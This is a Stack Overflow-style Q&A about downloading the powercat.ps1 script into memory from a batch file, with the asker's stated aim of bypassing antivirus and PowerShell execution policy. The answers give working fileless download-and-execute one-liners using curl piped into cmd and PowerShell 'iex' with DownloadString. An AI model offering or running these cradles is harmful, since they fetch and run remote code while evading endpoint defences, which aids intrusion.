# Download remote file into memory via pure batch

Tags: powershell, batch-file, cmd

In my batch script, I am trying to download and execute a powershell script remotely. Here is the url:

```
https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
```

I want to download the file **into memory (without touching disk)**, for several reasons:

1. It bypasses AV detection
2. It bypasses Powershell executionpolicy, so there's no need for the `powershell -nop -ep bypass` that causes AV detection
3. Won't throw unneccessary syntax errors
4. You can directly use functions defined inside the .ps1 script

Obviously i can use `certutil`:

```
certutil -urlcache -split -f <url>
```

but I don't want the file to hit disk, which can cause AV detection.
The same thing can be done with easily using other languages, like PowerShell:

```
(New-Object Net.WebClient).DownloadString($url)
```

OR

```
(New-Object IO.StreamReader([Net.HttpWebRequest]::Create($url).GetResponse().GetResponseStream())).ReadToEnd()
```

I know batch isn't the best language to do this, but is it possible? (I want **pure batch**)

Comment: Does this answer your question? [Is it possible to run an .exe or .bat file on 'onclick' in HTML](https://stackoverflow.com/questions/18980957/is-it-possible-to-run-an-exe-or-bat-file-on-onclick-in-html)

Comment: That isn't what i meant.

Comment: Read the answer [here](https://stackoverflow.com/questions/37933555/force-batch-file-to-load-to-ram-before-running) by @Jeb. Also follow the link to DBenham's [post](https://stackoverflow.com/questions/20329355/how-to-make-a-batch-file-delete-itself/20333575#20333575)

Comment: @OwainEsau please enlighten me with how exactly that link has to do with loading downloading into memory?

Answer (score 2, accepted):

#### Download and execute without a temporary file

```
curl -s https://example.com/test.bat | cmd /v:on /k
```

Example test.bat

```
@echo off
(
cls

echo Hello
echo Time: !time!
exit
)
```

#### Building the code

As said in [Force batch file to load to RAM before running](https://stackoverflow.com/a/37940551/463115) you can cache a single command block.

There are some limitations:

- It's running in cmd (not batch) context,
  variable expansion is a bit different.
- Labels can't be used

With this technique you can use the normal [batch macro style](https://www.dostips.com/forum/viewtopic.php?t=2518).

Comment: i was too late to respond, but the `GOTO :NONEXISTANTLABEL` was blowin' my mind!

Answer (score 2):

I know you want pure batch, but seriously though, even with `Restricted` execution policy of powershell, it permits individual commands. See https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7

So its as simple as

```
powershell -command iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
```

Comment: i already know how to use `DownloadString`, but thank you for pointing out it's pointless to not use powershell.

Comment: @HackingAddict1337 But if you are running a powershell script, you still would have to run the powershell program anyway, so why not?

Answer (score -2):

To my knowledge, no. Batch reads a file by accessing it via read perms. This means that it would not use the right protocol to access a file on a web server without batch allowing it to be read via FTP.

Comment: What I want do is send a http request to the site via a batch file to copy the content of the remote file. It (should?) have nothing to do with read perms. Also, i'm using `http` not ftp.